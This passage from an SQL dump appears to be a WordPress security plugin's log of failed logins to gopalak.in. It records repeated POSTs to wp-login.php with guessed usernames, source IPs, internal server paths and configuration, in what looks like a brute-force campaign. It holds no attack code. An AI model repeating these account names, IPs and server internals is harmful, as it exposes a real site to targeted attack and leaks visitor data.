23:44:41'),(94926,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"120\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58855\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"120\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746466636.185251;s:12:\"REQUEST_TIME\";i:1746466636;}}','107.151.209.126',1,'2025-05-05 23:07:17','2025-05-06 23:44:41'),(94927,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58848\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746466636.1904991;s:12:\"REQUEST_TIME\";i:1746466636;}}','107.151.209.126',1,'2025-05-05 23:07:18','2025-05-06 23:44:41'),(94928,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58856\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746466636.179606;s:12:\"REQUEST_TIME\";i:1746466636;}}','107.151.209.126',1,'2025-05-05 23:07:18','2025-05-06 23:44:41'),(94929,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58836\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746466636.1774459;s:12:\"REQUEST_TIME\";i:1746466636;}}','107.151.209.126',1,'2025-05-05 23:07:18','2025-05-06 23:44:41'),(94930,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62371\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746468880.156477;s:12:\"REQUEST_TIME\";i:1746468880;}}','107.151.209.126',1,'2025-05-05 23:44:41','2025-05-06 23:44:41'),(94931,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"119\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62358\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"119\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746468880.1574099;s:12:\"REQUEST_TIME\";i:1746468880;}}','107.151.209.126',1,'2025-05-05 23:44:41','2025-05-06 23:44:41'),(94932,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62367\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746468880.1445949;s:12:\"REQUEST_TIME\";i:1746468880;}}','107.151.209.126',1,'2025-05-05 23:44:41','2025-05-06 23:44:41'),(94933,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62369\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746468880.1339409;s:12:\"REQUEST_TIME\";i:1746468880;}}','107.151.209.126',1,'2025-05-05 23:44:41','2025-05-06 23:44:41'),(94934,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62361\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746468880.145889;s:12:\"REQUEST_TIME\";i:1746468880;}}','107.151.209.126',1,'2025-05-05 23:44:41','2025-05-06 23:44:41'),(94935,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53630\";s:11:\"REMOTE_ADDR\";s:13:\"81.177.140.54\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746730742.7452731;s:12:\"REQUEST_TIME\";i:1746730742;}}','81.177.140.54',0,'2025-05-09 00:29:07','1970-01-01 00:00:00'),(94936,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34104\";s:11:\"REMOTE_ADDR\";s:14:\"199.188.207.22\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746731298.304184;s:12:\"REQUEST_TIME\";i:1746731298;}}','199.188.207.22',0,'2025-05-09 00:38:20','1970-01-01 00:00:00'),(94937,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57234\";s:11:\"REMOTE_ADDR\";s:14:\"67.223.118.151\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";